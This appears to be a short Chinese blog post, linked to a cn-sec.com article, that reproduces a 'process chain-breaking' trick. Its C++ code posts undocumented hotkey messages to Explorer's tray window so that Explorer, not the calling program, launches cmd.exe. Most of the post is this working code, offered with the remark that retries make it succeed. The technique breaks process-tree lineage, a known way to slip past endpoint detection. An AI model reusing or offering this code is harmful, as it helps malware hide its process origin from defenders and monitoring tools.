进程断链复现代码

May 25, 2023

原始文章地址:https://cn-sec.com/archives/1734689.html

复现代码:

#include <iostream>
#include <Windows.h>
#include <tchar.h>
#include <CommCtrl.h>
#define TM_REGKEY           0x4e9
#define TM_RUNKEY           0x312
#define TM_UNKEY			0x4EA
int main() {
	int hotkeyid=0;
	HWND tray_wnd = FindWindowA("Shell_TrayWnd", NULL);
	ATOM atom = GlobalAddAtom(TEXT("C:\\Windows\\SysWOW64\\cmd.exe"));
	if (atom == 0) {
		return 1;
	}
	for (char key = 'A'; key <= 'K'; ++key) {
		WORD wHotkey =  key;
		Sleep(100);
		PostMessageA(tray_wnd, TM_REGKEY, wHotkey, atom);
	}
	Sleep(100);
	PostMessageA(tray_wnd, TM_RUNKEY, 10, 0);
	Sleep(100);
	for (char key = 'A'; key <= 'K'; ++key) {
		WORD wHotkey =  key;
		Sleep(100);
		PostMessageA(tray_wnd, TM_UNKEY, wHotkey, 0);
	}
}

仍然是个概率学事件,不过成功概率很高.23333 多跑几次肯定可以.